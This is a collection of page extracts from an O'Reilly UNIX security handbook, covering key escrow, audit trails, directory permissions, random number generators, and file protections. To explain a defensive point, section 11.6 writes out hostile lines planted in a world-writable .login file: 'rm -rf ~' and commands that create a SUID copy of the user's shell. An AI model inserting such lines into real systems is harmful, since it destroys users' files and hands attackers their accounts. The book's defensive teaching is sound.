Appendix D, Paper Sources, starting with Building in Big Brother, edited by Professor Lance Hoffman.<br />

[4] Or any other government!<br />

A Note About Key Escrow<br />

There has been considerable debate recently centering on the notion of key escrow. The usual context is<br />

during debate over the ability of private citizens to have access to strong cryptography. Many<br />

government officials and prominent scientists advocate a form of escrowed encryption as a good<br />

compromise between law enforcement needs and privacy concerns. In such schemes, a copy of the<br />

decryption key for each user is escrowed by one or more trusted parties, and is available if a warrant is<br />

issued for it.<br />

Whatever your feelings are on the matter of law enforcement access to your decryption keys, consider<br />

escrowing your keys! By this, we do not mean making your keys available to the government. Rather, we<br />

mean placing a copy of your keys in a secure location where they can be retrieved if you or someone else<br />

needs them. You may pick a key so strong that you forget it a year from now. Or, you might develop<br />

amnesia, get food poisoning from a bad Twinkie, or get kidnapped by aliens to keep Elvis company. If<br />

any of these calamities befall you, how are your coworkers or family going to decrypt the vital records<br />

that you have encrypted?<br />

We recommend that you deposit copies of your encryption keys and passwords in safe locations, such as<br />

a safe or safety deposit box. If you are uncomfortable about leaving the keys all in one place, there are<br />

algorithms with which you can split a key into several parts and deposit a part with each of several<br />

trusted parties. With key-splitting schemes, one or two parts by themselves are not enough to recreate the<br />

key, but a majority of them is enough to recover the key. Consult a good book on cryptography for<br />

details.<br />

But do escrow your own keys!<br />

5.10 Summary 6.2 What Is Encryption?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_01.htm (4 of 4) [2002-04-12 10:45:31]


[Chapter 10] 10.4 Per-User Trails in the Filesystem<br />

Chapter 10<br />

Auditing and Logging<br />

10.4 Per-User Trails in the Filesystem<br />

Although not obvious, there are some files that are kept on a per-user basis that can be helpful in<br />

analyzing when something untoward has happened on your system. While not real log files, as such, they<br />

can be treated as a possible source of information on user behavior.<br />

10.4.1 Shell History<br />

Many of the standard user command shells, including csh, tcsh, and ksh, can keep a history file. When<br />

the user issues commands, the text of each command and its arguments are stored into the history file for<br />

later re-execution. If you are trying to recreate activity performed on an account, possibly by some<br />

intruder, the contents of this file can be quite helpful when coupled with system log information. You<br />

must check the modification time on the file to be sure that it was in use during the time the suspicious<br />

activity occurred. If it was created and modified during the intruder's activities, you should be able to<br />

determine the commands run, the programs compiled, and sometimes even the names of remote accounts<br />

or machines that might also be involved in the incident. Be sure of your target, however, because this is<br />

potentially a violation of privacy for the real user of this account.<br />

Obviously, an aware intruder will delete the file before logging out. Thus, this mechanism may be of<br />

limited utility. However, there are two ways to increase your opportunity to get a useful file. The first<br />

way is to force the logout of the suspected intruder, perhaps by using a signal or shutting down the<br />

system. If a history file is being kept, this will leave the file on disk where it can be read. The second way<br />

to increase your chances of getting a usable file is to make a hard link to the existing history file, and to<br />

locate the link in a directory on the same disk that is normally inaccessible to the user (e.g., in a<br />

root-owned directory). Even if the intruder unlinks the file from the user's directory, it can still be<br />

accessed through the extra link.<br />

Also note that this technique can come in handy if you suspect that an account is being used<br />

inappropriately. You can alter the system profile to create and keep a history file, if none was kept<br />

before. On some systems, you can even designate a named pipe (FIFO) as the history file, thus<br />

transmitting the material to a logging process in a manner that cannot be truncated or deleted.<br />

Even if you were unable to preserve a copy of the history file, but one was created and then unlinked by<br />

the intruder, you can still gain some useful information if you act quickly enough. The first thing you<br />

must do is to either take the system to single-user mode, or umount the disk with the suspect account (we<br />

recommend going to single-user mode). Then, you can use disk-examination tools to look at the records<br />

on the free list. When a file is deleted, the contents are not immediately overwritten. Instead, the data<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_04.htm (1 of 2) [2002-04-12 10:45:31]


[Chapter 10] 10.4 Per-User Trails in the Filesystem<br />

records are added back into the freelist on disk. If they are not reused yet (which is why you umount the<br />

disk or shut the system down), you can still read the contents.<br />

10.4.2 Mail<br />

Some user accounts are configured to make a copy of all outgoing mail in a file. If an intruder sends mail<br />

from a user account where this feature is set (or where you set it), this feature can provide you with<br />

potentially useful information. In at least one case we know of, a person stealing confidential information<br />

by using a coworker's pirated password was exposed because of recorded email to his colleagues that he<br />

signed with his own name!<br />

Some systems also record a log file of mail sent and received. This file can be kept per-user, or it may be<br />

part of the system-wide syslog audit trail. The contents of this log can be used to track what mail has<br />

come in and left the system. If nothing else, we have found this information to be useful when a disk<br />

error (or human error) wipes out a whole set of mailboxes - the people listed in the mail log file can be<br />

contacted to resend their mail.<br />

10.4.3 Network Setup<br />

Each user account can have several network configuration files that can be edited to provide shortcuts for<br />

commands, or to assert access rights. Sometimes, the information in these files will provide a clue as to<br />

the activities of a malefactor. Examples include the .rhosts file for remote logins, and the .netrc file for<br />

FTP. Examine these files carefully for clues, but remember: the presence of information in one of these<br />

files may have been there prior to the incident, or it may have been planted to throw you off.<br />

10.3 Program-Specific Log<br />

Files<br />

10.5 The <strong>UNIX</strong> System Log<br />

(syslog) Facility<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_04.htm (2 of 2) [2002-04-12 10:45:31]


[Chapter 11] 11.2 Damage<br />

11.2 Damage<br />

Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

The damage that programmed threats do ranges from the merely annoying to the catastrophic - for<br />

example, the complete destruction of all data on a system by a low-level disk format. The damage may<br />

be caused by selective erasures of particular files, or minute data changes that swap random digits or zero<br />

out selected values. Many threats may seek specific targets - their authors may wish to damage a<br />

particular user's files, destroy a particular application, or completely initialize a certain database to hide<br />

evidence of some other activity.<br />

Disclosure of information is another type of damage that may result from programmed threats. Rather<br />

than simply altering information on disk or in memory, a threat can make some information readable,<br />

send it out as mail, post it on a bulletin board, or print it on a printer. This information could include<br />

sensitive material, such as system passwords or employee data records, or something as damaging as<br />

trade secret software. Programmed threats may also allow unauthorized access to the system, and may<br />

result in installing unauthorized accounts, changing passwords, or circumventing normal controls. The<br />

type of damage done varies with the motives of the people who write the malicious code.<br />

Malicious code can cause indirect damage, too. If your firm ships software that inadvertently contains a<br />

virus or logic bomb, there are several forms of potential damage to consider. Certainly, your corporate<br />

reputation will suffer. Your company could also be held accountable for customer losses as well; licenses<br />

and warranty disclaimers used with software might not protect against damage suits in such a situation.<br />

You cannot know with certainty that any losses (of either kind - direct or indirect) will be covered by<br />

business insurance. If your company does not have a well-defined security policy and your employees<br />

fail to exercise precautions in the preparation and distribution of software, your insurance may not cover<br />

subsequent losses. Ask your insurance company about any restrictions on their coverage of such<br />

incidents.<br />

11.1 Programmed Threats:<br />

Definitions<br />

11.3 Authors<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_02.htm [2002-04-12 10:45:31]


[Chapter 1] 1.2 What Is an Operating System?<br />

Chapter 1<br />

Introduction<br />

1.2 What Is an Operating System?<br />

For most people, a computer is a tool for solving problems. When running a word processor, a computer<br />

becomes a machine for arranging words and ideas. With a spreadsheet, the computer is a financial<br />

planning machine, one that is vastly more powerful than a pocket calculator. Connected to an electronic<br />

network, a computer becomes part of a powerful communications system.<br />

At the heart of every computer is a master set of programs called the operating system. This is the<br />

software that controls the computer's input/output systems such as keyboards and disk drives, and that<br />

loads and runs other programs. The operating system is also a set of mechanisms and policies that help<br />

define controlled sharing of system resources.<br />

Along with the operating system is a large set of standard utility programs for performing common<br />

functions such as copying files and listing the contents of directories. Although these programs are not<br />

technically part of the operating system, they can have a dramatic impact on a computer system's<br />

security.<br />

All of <strong>UNIX</strong> can be divided into three parts:<br />

●<br />

●<br />

●<br />

The kernel, or the heart of the <strong>UNIX</strong> system, is the operating system. The kernel is a special<br />

program that is loaded into the computer when it is first turned on. The kernel controls all of the<br />

computer's input and output systems; it allows multiple programs to run at the same time, and it<br />

allocates the system's time and memory among them. The kernel includes the filesystem, which<br />

controls how files and directories are stored on the computer's hard disk. The filesystem is the<br />

main mechanism by which computer security is enforced. Some modern versions of <strong>UNIX</strong> allow<br />

user programs to load additional modules, such as device drivers, into the kernel after the system<br />

starts running.<br />

Standard utility programs are run by users and by the system. Some programs are small and serve<br />

a single function - for example, /bin/lslists files and /bin/cp copies them. Other programs are large<br />

and perform many functions - for example, /bin/sh and /bin/csh, <strong>UNIX</strong> shells that process user<br />

commands, are themselves programming languages.<br />

System database files, most of which are relatively small, are used by a variety of programs on the<br />

system. One file, /etc/passwd, contains the master list of every user on the system. Another file,<br />

/etc/group, describes groups of users with similar access rights.<br />

From the point of view of <strong>UNIX</strong> security, these three parts interact with a fourth entity:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_02.htm (1 of 2) [2002-04-12 10:45:31]


[Chapter 1] 1.2 What Is an Operating System?<br />

●<br />

<strong>Sec</strong>urity policy, which determines how the computer is run with respect to the users and system<br />

administration. Policy plays as important a role in determining your computer's security as the<br />

operating system software. A computer that is operated without regard to security cannot be<br />

trusted, even if it is equipped with the most sophisticated and security-conscious software. For this<br />

reason, establishing and codifying policy plays a very important role in the overall process of<br />

operating a secure system. This is discussed further in Chapter 2.<br />

1.1 What Is Computer<br />

<strong>Sec</strong>urity?<br />

1.3 History of <strong>UNIX</strong><br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_02.htm (2 of 2) [2002-04-12 10:45:31]


[Chapter 19] 19.7 Other Network Authentication Systems<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

19.7 Other Network Authentication Systems<br />

Besides Sun's <strong>Sec</strong>ure RPC and Kerberos, there are a variety of other systems for providing authentication<br />

and encryption services over an unprotected network.<br />

19.7.1 DCE<br />

DCE is the Distributed Computing Environment developed by the Open Software Foundation. DCE is an<br />

integrated computing environment that provides many services, including user authentication, remote<br />

procedure call, distributed file sharing, and configuration management. DCE's authentication is very<br />

similar to Kerberos, and its file sharing is very similar to the Andrew File System.<br />

DCE's security is based on a <strong>Sec</strong>urity Server. The <strong>Sec</strong>urity Server maintains an access control list for<br />

various operations and decides whether clients have the right to request operations.<br />

DCE clients communicate with DCE servers using DCE Authenticated RPC. To use Authenticated RPC,<br />

each DCE principal (user or service) must have a secret key that is known only to itself and the <strong>Sec</strong>urity<br />

Server.<br />

A complete description of DCE can be found at http://www.osf.org/dce<br />

19.7.2 SESAME<br />

SESAME is the <strong>Sec</strong>ure European System for Applications in a Multi-vendor Environment. It is a single<br />

sign-on authentication system similar to Kerberos.<br />

SESAME incorporates many features of Kerberos 5, but adds heterogeneity, access control features,<br />

scalability of public key systems, improved manageability, and an audit system.<br />

The primary difference between SESAME and Kerberos is that SESAME uses public key cryptography<br />

(which is not covered by patent in Europe), allowing it to avoid some of the operational difficulties that<br />

Kerberos experiences. SESAME is funded in part by the Commission of the European Union's RACE<br />

program.<br />

A complete description of SESAME can be found at the following Web address:<br />

http://www.esat.kuleuven.ac.be/cosic/sesame3.html<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_07.htm (1 of 2) [2002-04-12 10:45:32]


[Chapter 19] 19.7 Other Network Authentication Systems<br />

19.6 Kerberos 20. NFS<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_07.htm (2 of 2) [2002-04-12 10:45:32]


[Chapter 16] 16.4 Other Network Protocols<br />

Chapter 16<br />

TCP/IP Networks<br />

16.4 Other Network Protocols<br />

There are several other network protocols that may be involved in a network environment. We'll mention<br />

them here, but we won't go into detail about them as they are not as common in <strong>UNIX</strong> environments as<br />

IP networks are. If you are curious about these other network protocols, we suggest that you consult a<br />

good book on networks and protocols; several are listed in Appendix D. Several of these protocols can<br />

share the same physical network as an IP-based network, thus allowing more economical use of existing<br />

facilities, but they also make traffic more available to eavesdroppers and saboteurs.<br />

16.4.1 IPX<br />

Novell Netware networks use a proprietary protocol known as <strong>Internet</strong> Packet eXchange protocol (IPX).<br />

It does not scale well to large networks such as the <strong>Internet</strong>, although RFC1234 describes a system for<br />

connecting IPX networks together using IP networks and a technique known as tunneling.<br />

IPX is commonly found in PC-based networks. Some <strong>UNIX</strong> vendors support IPX-based services and<br />

connections with their products.<br />

16.4.2 SNA<br />

The System Network Architecture (SNA) is an old protocol used by IBM to link mainframes together. It<br />

is seldom found elsewhere. These days, IBM machines are in the process of transitioning to IP or IPX.<br />

We expect that SNA will be extinct before too long.<br />

16.4.3 DECnet<br />

The DECnet protocol was developed at Digital Equipment Corporation to link together machines and is<br />

based on Digital's proprietary operating systems. DECnet provides many of the same basic functions as<br />

IP, including mail, virtual terminals, file sharing, and network time. During its heyday, many third parties<br />

also built peripherals to support DECnet. Many large DECnet networks have been built, but the trend<br />

within Digital has been to migrate to open standards such as IP.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_04.htm (1 of 2) [2002-04-12 10:45:32]


[Chapter 16] 16.4 Other Network Protocols<br />

16.4.4 OSI<br />

The Open System Interconnection (OSI) protocols, developed by the International Standards<br />

Organization (ISO), are an incredibly complex and complete set of protocols for every kind of network<br />

implementation. OSI was developed after TCP/IP, and supports many of the same kinds of services.<br />

OSI is a classic example of what happens when a committee is asked to develop a complex specification<br />

without the benefit of first developing working code. Although many organizations have stated that they<br />

intend to switch from IP to OSI standards, this has not happened except for a few high-level services,<br />

such as X.500 directory service and cryptographic certificates. On matters such as data transmission, the<br />

OSI standards have in general proven to be too cumbersome and complex to fully implement efficiently.<br />

We are clearly not big fans of OSI, but if you are interested in pursuing all the gory details, an excellent<br />

book on the topic (which will give you a fairer treatment of OSI than we do here) is The Open Book: A<br />

<strong>Practical</strong> Perspective on OSI by Marshall T. Rose (Prentice Hall, 1990).<br />

16.4.5 XNS<br />

The Xerox Network Systems (XNS) protocol family was developed by Xerox. These were supported by<br />

a few other computer manufacturers, but few people use them now. Development inside Xerox has<br />

largely switched over to IP as well.<br />

16.3 IP <strong>Sec</strong>urity 16.5 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_04.htm (2 of 2) [2002-04-12 10:45:32]


[Chapter 5] 5.4 Using Directory Permissions<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.4 Using Directory Permissions<br />

Unlike many other operating systems, <strong>UNIX</strong> stores the contents of directories in ordinary files. These files are similar to<br />

other files, but they are specially marked so that they can only be modified by the operating system.<br />

As with other files, directories have a full complement of security attributes: owner, group, and permission bits. But<br />

because directories are interpreted in a special way by the filesystem, the permission bits have special meanings (see<br />

Table 5.11).<br />

Table 5.11: Permissions for Directories<br />

Contents Permission Meaning<br />

r read You can use the opendir() and readdir() functions (or the ls command) to find out which files are<br />

in the directory.<br />

w write You can add, rename, or remove entries in that directory.<br />

x execute You can stat the contents of a directory (e.g., you can determine the owners and the lengths of<br />

the files in the directory). You also need execute access to a directory to make that directory<br />

your current directory or to open files inside the directory (or in any of the directory's<br />

subdirectories).<br />

If you want to prevent other users from reading the contents of your files, you have two choices:<br />

1.<br />

2.<br />

You can set the permission of each file to 0600, so only you have read/write access.<br />

You can put the files in a directory and set the permission of that directory to 0700, which prevents other users<br />

from accessing the files in the directory (or in any of the directory's subdirectories) unless there is a link to the<br />

file from somewhere else.<br />

Note the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

You must have execute access for a directory to make it your current directory (via cd or chdir) or to change to<br />

any directory beneath (contained in) that directory.<br />

If you do not have execute access to a directory, you cannot access the files within that directory, even if you own<br />

them.<br />

If you have execute access to a directory but do not have read access, you cannot list the names of files in the<br />

directory (e.g., you cannot read the contents of the directory). However, if you have access to individual files,<br />

you can run programs in the directory or open files in it. Some sites use this technique to create secret files - files<br />

that users can access only if they know the files' names.<br />

To unlink a file from a directory, you need only have write and execute access to that directory even if you have<br />

no access rights to the file itself.<br />

If you have read access to a directory but do not have execute access, you will be able to display a short listing of<br />

the files in the directory (ls); however, you will not be able to find out anything about the files other than their<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_04.htm (1 of 3) [2002-04-12 10:45:32]


[Chapter 5] 5.4 Using Directory Permissions<br />

names and inode numbers (ls -i) because you can't stat the files. Remember that the directory itself only contains<br />

name and inode information.<br />

This processing can cause quite a bit of confusion, if you are not expecting it. For example:<br />

% ls -ldF conv<br />

dr------ 4 rachel 1024 Jul 6 09:42 conv/<br />

% ls conv<br />

3ps.prn bizcard.ps letterhead.eps retlab.eps<br />

% ls -l conv<br />

conv/3ps.prn not found<br />

conv/retlab.eps not found<br />

conv/letterhead.eps not found<br />

conv/bizcard.ps not found<br />

total 0<br />

%<br />

Removing Funny Files<br />

One of the most commonly asked questions by new <strong>UNIX</strong> users is "How do I delete a file whose name begins with a<br />

dash? If I type rm -foo, the rm command treats the filename as an option." There are two simple ways to delete such a<br />

file. The first is to use a relative pathname:<br />

% rm ./-foo %<br />

A second way is to supply an empty option argument, although this does not work under every version of <strong>UNIX</strong>:<br />

% rm - -foo %<br />

If you have a file that has control characters in it, you can use rm command with the -i option and an asterisk, which<br />

gives you the option of removing each file in the directory - even the ones that you can't type.<br />

% rm -i *<br />

rm: remove faq.html (y/n)? n<br />

rm: remove foo (y/n)? y<br />

%<br />

A great way to discover files with control characters in them is to use the -q option to the <strong>UNIX</strong> ls command. You can,<br />

for example, alias the ls command to be ls -q. Files that have control characters in their filenames will then appear with<br />

question marks:<br />

% alias ls ls -q<br />

% ls f*<br />

faq.html fmMacros fmdictionary fo?o<br />

faxmenu.sea.hqx fmMacrosLog.backup fmfilesvisited<br />

%<br />

Table 5.12 contains some common directory permissions and their uses.<br />

Table 5.12: Common Directory Permissions<br />

Octal Number Directory Permission<br />

0755 / Anybody can view the contents of the directory, but only the owner or superuser can make<br />

changes.<br />

1777 /tmp Any user can create a file in the directory, but a user cannot delete another user's files.<br />

0700 $HOME A user can access the contents of his home directory, but nobody else can.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_04.htm (2 of 3) [2002-04-12 10:45:32]


[Chapter 5] 5.4 Using Directory Permissions<br />

5.3 The umask 5.5 SUID<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_04.htm (3 of 3) [2002-04-12 10:45:32]


[Chapter 1] 1.5 Role of This Book<br />

1.5 Role of This Book<br />

Chapter 1<br />

Introduction<br />

If we can't change <strong>UNIX</strong> and the environment in which it runs, the next best thing is to learn about how<br />

to protect the system as best we can. That's the goal of this book. If we can provide information to users<br />

and administrators in a way that helps them understand the way things work and how to use the<br />

safeguards, then we should be moving in the right direction. After all, these areas seem to be where many<br />

of the problems originate.<br />

Unfortunately, knowing how things work on the system is not enough. Because of the <strong>UNIX</strong> design, a<br />

single flaw in a <strong>UNIX</strong> system program can compromise the security of the operating system as a whole.<br />

This is why vigilance and attention are needed to keep a system running securely: after a hole is<br />

discovered, it must be fixed. Furthermore, in this age of networked computing, that fix must be made<br />

widely available, lest some users who have not updated their software fall victim to more up-to-date<br />

attackers.<br />

NOTE: Although this book includes numerous examples of past security holes in the <strong>UNIX</strong><br />

operating system, we have intentionally not provided the reader with an exhaustive list of<br />

the means by which a machine can be penetrated. Not only would such information not<br />

necessarily help to improve the security of your system, but it might place a number of<br />

systems running older versions of <strong>UNIX</strong> at additional risk.<br />

Even properly configured <strong>UNIX</strong> systems are still very susceptible to denial of service attacks, where one<br />

user can make the system unusable for everyone else by "hogging" a resource or degrading system<br />

performance. In most circumstances, however, administrators can track down the person who is causing<br />

the interruption of service and deal with that person directly. We'll talk about denial of service attacks in<br />

Chapter 25, Denial of Service Attacks and Solutions.<br />

First of all, we start by discussing basic issues of policy and risk in Chapter 2. Before you start setting<br />

permissions and changing passwords, make sure you understand what you are protecting and why. You<br />

should also understand what you are protecting against. Although we can't tell you all of that, we can<br />

outline some of the questions you need to answer before you design your overall security plan.<br />

Throughout the rest of the book, we'll be explaining <strong>UNIX</strong> structures and mechanisms that can affect<br />

your overall security. We concentrate on the fundamentals of the way the system behaves so you can<br />

understand the basic principles and apply them in your own environment. We have specifically not<br />

presented examples and suggestions of where changes in the source code can fix problems or add<br />

security. Although we know of many such fixes, most <strong>UNIX</strong> sites do not have access to source code.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_05.htm (1 of 2) [2002-04-12 10:45:32]


[Chapter 1] 1.5 Role of This Book<br />

Most system administrators do not have the necessary expertise to make the required changes.<br />

Furthermore, source code changes, as do configurations. A fix that is appropriate in March 1996 may not<br />

be desirable on a version of the operating system shipped the following September. Instead, we present<br />

principles, with the hope that they will give you better long-term results than one-time custom<br />

modifications.<br />

We suggest that you keep in mind that even if you take everything to heart that we explain in the<br />

following chapters, and even if you keep a vigilant watch over your systems, you may still not fully<br />

protect your assets. You need to educate every one of your users about good security and convince them<br />

to practice what they learn. Computer security is a lonely, frustrating occupation if it is practiced as a<br />

case of "us" (information security personnel) versus "them" (the rest of the users). If you can practice<br />

security as "all of us" (everyone in the organization) versus "them" (people who would breach our<br />

security), the process will be much easier. You also need to help convince vendors to produce safer code.<br />

If we all put our money behind our stated concerns, maybe the vendors will finally catch on.<br />

1.4 <strong>Sec</strong>urity and <strong>UNIX</strong> 2. Policies and Guidelines<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_05.htm (2 of 2) [2002-04-12 10:45:32]


[Chapter 23] 23.7 <strong>UNIX</strong> Pseudo-Random Functions<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.7 <strong>UNIX</strong> Pseudo-Random Functions<br />

The standard <strong>UNIX</strong> C library provides two random number generators: rand( ) and random( ). A third<br />

random number generator, drand48( ), is available on some versions of <strong>UNIX</strong>. Although you won't want<br />

to use any of these routines to produce cryptographic random numbers, we'll briefly explain each. Then,<br />

if you need to use one of them for something else, you'll know something about its strengths and<br />

shortcomings.<br />

23.7.1 rand ( )<br />

The original <strong>UNIX</strong> random number generator, rand( ), is not a very good random number generator. It<br />

uses a 32-bit seed and maintains a 32-bit internal state. The output of the function is also 32 bits in<br />

length, making it a simple matter to determine the function's internal state by examining the output. As a<br />

result, rand( ) is not very random. Furthermore, the low-order bits of some implementations are not<br />

random at all, but flip back and forth between 0 and 1 according to a regular pattern. The rand( ) random<br />

number generator is seeded with the function srand( ). On some versions of <strong>UNIX</strong>, a third function is<br />

provided, rand_r( ), for multi threaded applications. (The function rand( ) itself is not safe for multithreading,<br />

as it maintains internal state.)<br />

Do not use rand( ), even for simple statistical purposes.<br />

23.7.2 random ( )<br />

The function random( ) is a more sophisticated random number generator which uses nonlinear feedback<br />

and an internal table that is 124 bytes (992 bits) long. The function returns random values that are 32 bits<br />

in length. All of the bits generated by random( ) are usable.<br />

The random( ) function is adequate for simulations and games, but should not be used for security related<br />

applications such as picking cryptographic keys or simulating one- time pads.<br />

23.7.3 drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

The function drand48( ) is one of many functions which make up the System V random number<br />

generator. According to the Solaris documen- tation, the algorithm uses "the well-known linear<br />

congruential algorithm and 48-bit integer arithmetic." The function drand48( ) returns a double-precision<br />

number that is greater or equal to 0.0 and less than 1.0, while the lrand48( ) and mrand48( ) functions<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_07.htm (1 of 2) [2002-04-12 10:45:33]


[Chapter 23] 23.7 <strong>UNIX</strong> Pseudo-Random Functions<br />

return random numbers within a specified integer range. As with random( ), these functions provide<br />

excellent random numbers for simulations and games, but should not be used for security-related<br />

applications such as picking cryptographic keys or simulating one-time pads; linear congruential<br />

algorithms are too easy to break.<br />

23.7.4 Other random number generators<br />

There are many other random number generators. Some of them are optimized for speed, while others are<br />

optimized for randomness. You can find a list of other random number generators in Bruce Schneier's<br />

excellent book, Applied Cryptography (John Wiley & Sons, <strong>Sec</strong>ond Edition, 1995).<br />

Some versions of the Linux operating system have carefully thought out random number generators in<br />

their kernel, accessible through the /dev/random and /dev/urandom devices. We think that this design is<br />

excellent-especially when the random number generators take into account additional system states, user<br />

inputs, and "random" external events to provide numbers that are "more" random.<br />

23.6 Tips on Generating<br />

Random Numbers<br />

23.8 Picking a Random Seed<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_07.htm (2 of 2) [2002-04-12 10:45:33]


[Chapter 11] 11.6 Protecting Your System<br />

Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

11.6 Protecting Your System<br />

No matter what the threat is called, how it enters your system, or what the motives of the person(s) who wrote it<br />

may be, the potential for damage is your main concern. Any of these problems can result in downtime and lost or<br />

damaged resources. Understanding the nature of a threat is insufficient to prevent it from occurring.<br />

At the same time, remember that you do not need many special precautions or special software to protect against<br />

programmed threats. The same simple, effective measures you would take to protect your system against<br />

unauthorized entry or malicious damage from insiders will also protect your system against these other threats.<br />

11.6.1 File Protections<br />

Files, directories, and devices that are writable (world-writable) by any user on the system can be dangerous<br />

security holes. An attacker who gains access to your system can gain even more access by modifying these files,<br />

directories, and devices. Maintaining a vigilant watch over your file protections protects against intrusion and also<br />

protects your system's legitimate users from each other's mistakes and antics. (Chapter 5 introduces file<br />

permissions and describes how you can change them.)<br />

11.6.1.1 World-writable user files and directories<br />

Many inexperienced users (and even careless experienced users) often make themselves vulnerable to attack by<br />

improperly setting the permissions on files in their home directories.<br />

The .login file is a particularly vulnerable file. For example, if a user has a .login file that is world-writable, an<br />

attacker can modify the file to do his bidding. Suppose a malicious attacker inserts this line at the end of a user's<br />

.login file:<br />

/bin/rm -rf ~<br />

Whenever a user logs in, the C shell executes all of the commands in the .login file. A user whose .login file<br />

contains this nasty line will find all of his files deleted when he logs in!<br />

Suppose the attacker appends these lines to the user's .login file:<br />

/bin/cp /bin/sh /usr/tmp/.$USER<br />

/bin/chmod 4755 /usr/tmp/.$USER<br />

When the user logs in, the system creates a SUID shell in the /usr/tmp directory that will allow the attacker to<br />

assume the identity of the user at some point in the future.<br />

In addition to .login, many other files pose security risks when they are world writable. For example, if an<br />

attacker modifies a world-writable .rhosts file, she can take over the user's account via the network.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_06.htm (1 of 3) [2002-04-12 10:45:33]


[Chapter 11] 11.6 Protecting Your System<br />

In general, the home directories and the files in the home directories should have the permissions set so that they<br />

are only writable by the owner. Many files in the home directory, such as .rhosts, should only be readable by the<br />

owner as well. This practice will hinder an intruder in searching for other avenues of attack.<br />

11.6.1.2 Writable system files and directories<br />

There is also a risk when system files and directories are world writable. An attacker can replace system programs<br />

(such as /bin/ls) with new programs that do the attacker's bidding. This practice is discussed in Chapter 8,<br />

Defending Your Accounts.<br />

NOTE: If you have a server that exports filesystems containing system programs (such as the /bin<br />

and /usr/bin directories), you may wish to export those filesystems read-only. Exporting a filesystem<br />

read-only renders the client unable to modify the files in that directory. To export a filesystem<br />

read-only, you must specify the read-only option in the /etc/exports file on the server. For example,<br />

to export the /bin and /usr/bin filesystems read-only, specify the following in your /etc/dfs/dfstab file:<br />

share -F nfs -o ro=client /bin<br />

share -F nfs -o ro=client /usr/bin<br />

On a Berkeley-based system, place these lines in your /etc/exports file:<br />

/bin -ro, access=client<br />

/usr/bin -ro, access=client<br />

Group-writable files<br />

Sometimes, making a file group writable is almost as risky as making it world writable. If everybody on your<br />

system is a member of the group user, then making a file group-writable by the group user is the same as making<br />

the file world-writable.<br />

You can use the find command to search for files that are group writable by a particular group, and to print a list<br />

of these files. For example, to search for all files that are writable by the group user, you might specify a<br />

command in the following form:<br />

# find / -perm -020 -group user \!<br />

\( -type l -o -type p -o -type s \) -ls<br />

If you have NFS, be sure to use the longer version of the command:<br />

# find / \( -local -o -prune \) -perm -020 -group user \!<br />

\( -type l -o -type p -o -type s \) -ls<br />

Often, files are made group writable so several people can work on the same project, and this may be appropriate<br />

in your system. However, some files, such as .cshrc and .profile, should never be made group writable. In many<br />

cases, this rule can be generalized to the following:<br />

Any file beginning with a period should not be world writable or group writable.<br />

A more security-conscious site can further generalize this rule:<br />

Files that begin with a period should not be readable or writable by anyone other than the file's owner<br />

(that is, they should be mode 600).<br />

Use the following form of the find command to search for all files beginning with a period in the /u filesystem that<br />

are either group writable or world writable:<br />

# find /u -perm -2 -o -perm -20 -name .\* -ls<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_06.htm (2 of 3) [2002-04-12 10:45:33]


